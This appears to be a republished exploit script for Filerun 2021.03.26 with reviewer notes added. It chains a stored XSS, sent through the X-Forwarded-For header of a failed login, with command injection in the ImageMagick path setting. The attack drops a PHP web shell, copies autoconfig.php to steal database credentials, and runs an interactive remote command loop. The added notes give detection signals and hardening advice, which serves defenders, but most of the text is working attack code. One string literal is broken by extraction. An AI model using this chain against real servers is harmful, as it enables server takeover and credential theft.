Filerun 2021.03.26 - Remote Code Execution (Authenticated) Exploit
# Exploit Title: Filerun 2021.03.26 - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: syntegris information solutions GmbH
# Credits: Christian P.
# Vendor Homepage: https://filerun.com
# Software Link: https://f.afian.se/wl/?id=SkPwYC8dOcMIDWohmyjOqAgdqhRqCZ3X&fmode=download&recipient=d3d3LmZpbGVydW4uY29t
# Version: 2021.03.26
# Tested on: official docker image

# PoC for exploiting a chain of a stored XSS and authenticated Remote Code Execution
#
# Reviewer notes (what the listing shows, read for detection and remediation):
#   * Stage 1 - stored XSS: a failed login is posted with HTML markup in the
#     X-Forwarded-For header. The listing implies the header value is stored
#     with the login failure and rendered unescaped later ("Injecting new log
#     message..."); which view renders it is not visible here - confirm.
#   * Stage 2 - command execution: the script run in the administrator's
#     session posts to the control-panel action `checkImageMagick` with
#     `mode=exec` and a `path` value containing a pipe and a shell command, so
#     the configured binary path appears to reach a shell unsanitised.
#   * Artifacts written on the server by this listing: `shell.php` in the web
#     root and `js/autoconfig.txt` (a copy of `system/data/autoconfig.php`).
#   * Log signals: repeated failed logins for user `nonexistend` roughly every
#     10 seconds; X-Forwarded-For values containing `<`, `>` or `onerror`;
#     POSTs to `action=checkImageMagick` whose `path` contains `|`, `>` or `#`;
#     GET requests to `/shell.php?cmd=`.
#   * Hardening: HTML-encode header-derived values wherever logs are displayed,
#     accept X-Forwarded-For only from known proxies and validate it as an IP
#     address, check the ImageMagick path against an allowlist and invoke it
#     without a shell, and stop the web server from executing PHP files in
#     directories the application can write to. Versions containing a fix are
#     not stated on this page; check the vendor's release notes.
import requests
import time
import sys

# this is the plain version of the payload below
# NOTE(review): `cpanel§ion` in this copy is an extraction artefact for
# `cpanel&section`; compare the same URL inside inject_code().
""" var xmlhttp = new XMLHttpRequest(); var url = '/?module=cpanel§ion=settings&page=image_preview&action=checkImageMagick' var payload = "echo '<?php echo shell_exec($_REQUEST[\'cmd\']); ?>' > shell.php #"; xmlhttp.onreadystatechange = function() { if (xmlhttp.readyState == XMLHttpRequest.DONE) { if (xmlhttp.status == 200) { console.log(xmlhttp.responseText); } } }; xmlhttp.open("POST", url, true); xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlhttp.send("mode=exec&path=convert|"+payload); """

# The base URL of the instance under test is the only command-line argument.
if not len(sys.argv) == 2:
    print("missing target url")
    sys.exit(1)

target = sys.argv[1]

def inject_code():
    # Sends one failed login whose X-Forwarded-For header carries an <img>
    # element with an onerror handler. No valid credentials are used in this
    # request; the "authenticated" part is the session in which the stored
    # markup is rendered later.
    # NOTE(review): the literal below is reproduced exactly as it appears on
    # the page; the page extraction has altered it.
    payload = "var xmlhttp = new XMLHttpRequest();
var url = '/?module=cpanel&section=settings&page=image_preview&action=checkImageMagick'
var payload = "echo '<?php echo shell_exec($_REQUEST[\'cmd\']); ?>'  > shell.php #";

xmlhttp.onreadystatechange = function() {
	if (xmlhttp.readyState == XMLHttpRequest.DONE) {
	   if (xmlhttp.status == 200) {
		   console.log(xmlhttp.responseText);
	   }
	   else if (xmlhttp.status == 400) {
		  alert('There was an error 400');
	   }
	   else {
		   alert('something else other than 200 was returned');
	   }
	}
};

xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send("mode=exec&path=convert|"+payload);
"
    # Login attempt with a non-existent user; only the header value matters.
    # The response (req) is never inspected.
    req = requests.post(
        "%s/?module=fileman&page=login&action=login" % target,
        data={'username': 'nonexistend', 'password': 'wrong', 'otp':'', 'two_step_secret':'','language':''},
        headers={'X-Forwarded-For': '<img src="/asdasdasd" onerror=%s >' % payload}
    )

def check_shell_exists():
    # True when GET <target>/shell.php answers 200. On a clean install this
    # file is not expected, so its presence in the web root is the primary
    # on-disk indicator of this chain.
    req = requests.get("%s/shell.php" % target)
    if req.status_code != 200:
        return False
    return True

def process_command(command):
    # Passes `command` in the `cmd` query parameter of shell.php and prints the
    # response body. The value is interpolated into the URL as-is, so the
    # commands appear in the web server's access log.
    req = requests.get("%s/shell.php?cmd=%s" % (target, command))
    print(req.text)

# Re-send the failed login every 10 seconds until shell.php answers 200. The
# loop only ends once the stored markup has been rendered in a session that is
# allowed to call the control-panel action; until then it keeps adding
# failed-login entries.
while True:
    print("Injecting new log message...")
    inject_code()
    time.sleep(10)
    if check_shell_exists():
        print("Shell exists under '%s/shell.php?cmd=ls'" % target)
        break

print("Lets get autoconfig.php which contains database credentials...")
# Copies the configuration file to a web-readable path and downloads it.
process_command("cp system/data/autoconfig.php js/autoconfig.txt")

ac_resp = requests.get("%s/js/autoconfig.txt" % target)
with open("filerun.autoconfig.php", "wb") as ac_f:
    ac_f.write(ac_resp.content)

# NOTE(review): this removes js/autoconfig.php, not the js/autoconfig.txt
# created above, so the copied configuration stays readable over HTTP. During
# incident response, look for js/autoconfig.txt and treat the database
# credentials in it as exposed (rotate them).
process_command("rm js/autoconfig.php")

# Interactive loop: each line read from stdin is sent to shell.php.
while True:
    command = input("Command:")
    process_command(command)

# 0day.today [2024-07-07] #